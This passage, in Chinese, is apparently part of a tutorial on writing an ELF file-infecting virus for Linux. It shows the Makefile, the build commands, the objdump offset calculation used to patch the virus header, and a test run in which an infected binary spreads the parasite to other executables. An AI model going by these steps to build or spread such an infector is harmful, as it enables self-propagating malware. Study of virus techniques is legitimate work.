五、 新编译环境下的调试方法 grip2@linux:~/tmp/virus> ls
g-elf-infector.c gsyscall.h gunistd.h gvirus.c gvirus.h foo.c
Makefile parasite-sample.c parasite-sample.h
调整Makefile文件,将编译模式改为调试模式,即关掉-DNDEBUG选项 grip2@linux:~/tmp/virus> cat Makefile
all: foo gei
gei: g-elf-infector.c gvirus.o
gcc -O2 $< gvirus.o -o gei -Wall #-DNDEBUG
foo: foo.c
gcc $< -o foo
gvirus.o: gvirus.c
gcc $< -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
clean:
rm *.o -rf
rm foo -rf
rm gei -rf
编译代码 grip2@linux:~/tmp/virus> make
gcc foo.c -o foo
gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG
先获取病毒代码长度,然后调整gvirus.c中的#define PARACODE_LENGTH定义
grip2@linux:~/tmp/virus>. /gei -l <.这里获取病毒代码的长度
Parasite code length: 1744
获取病毒代码开始位置和0xaabbccdd的地址,计算存放返回地址的地址的偏移 grip2@linux:~/tmp/virus> objdump -d gei grep aabbccdd
8049427: 68 dd cc bb aa push $0xaabbccdd
grip2@linux:~/tmp/virus> objdump -d gei grep ""
08048d80 :
8049450: e9 2b f9 ff ff jmp 8048d80
grip2@linux:~/tmp/virus> objdump -d gei grep ":"
08048d80 :
0x8049427与0x8048d80相减即获得我们需要的偏移,用这个值更新gvirus.h中的#define PARACODE_RETADDR_ADDR_OFFSET宏的值
重新编译 grip2@linux:~/tmp/virus> make clean
rm *.o -rf
rm foo -rf
rm gei -rf
grip2@linux:~/tmp/virus> make
gcc foo.c -o foo
gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG
grip2@linux:~/tmp/virus> ls
gei gsyscall.h gvirus.c gvirus.o foo.c parasite-sample.c
g-elf-infector.c gunistd.h gvirus.h foo Makefile parasite-sample.h
建立一个测试目录,测试一下 grip2@linux:~/tmp/virus> mkdir test
grip2@linux:~/tmp/virus> cp gei foo test
grip2@linux:~/tmp/virus> cd test
grip2@linux:~/tmp/virus/test> ls
gei foo
grip2@linux:~/tmp/virus/test> cp foo h
制作带毒程序 grip2@linux:~/tmp/virus/test>. /gei h
file size: 8668
e_phoff: 00000034
e_shoff: 00001134
e_phentsize: 00000020
e_phnum: 00000008
e_shentsize: 00000028
e_shnum: 00000025
text segment file offset: 0
[15 sections patched]
grip2@linux:~/tmp/virus/test> ll
total 44
-rwxr-xr-x 1 grip2 users 14211 2004-12-13 07:50 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:50 foo
运行带毒程序 grip2@linux:~/tmp/virus/test>. /h
.
..
gei
foo
h
.backup.h
real elf point
grip2@linux:~/tmp/virus/test> ll
total 52
-rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo
测试上面带毒程序运行后,是否感染了其他ELF程序 grip2@linux:~/tmp/virus/test>. /foo
.
..
gei
Better luck next file
foo
h
Better luck next file
.backup.h
Better luck next file
real elf point
OK,成功 grip2@linux:~/tmp/virus/test> cp. ./foo hh
grip2@linux:~/tmp/virus/test> ll
total 64
-rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:51 hh
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo
grip2@linux:~/tmp/virus/test>. /foo
.
..
gei
Better luck next file
foo
h
Better luck next file
.backup.h
Better luck next file
hh
real elf point
grip2@linux:~/tmp/virus/test>
六、总结
由于我既不是一个virus coder也不是一个anti-viruscoder,所以对病毒技术的掌握应该是有欠缺的。如果在文章中对病毒技术的描述不够准确,分析不够到位,还请指正,谢谢。
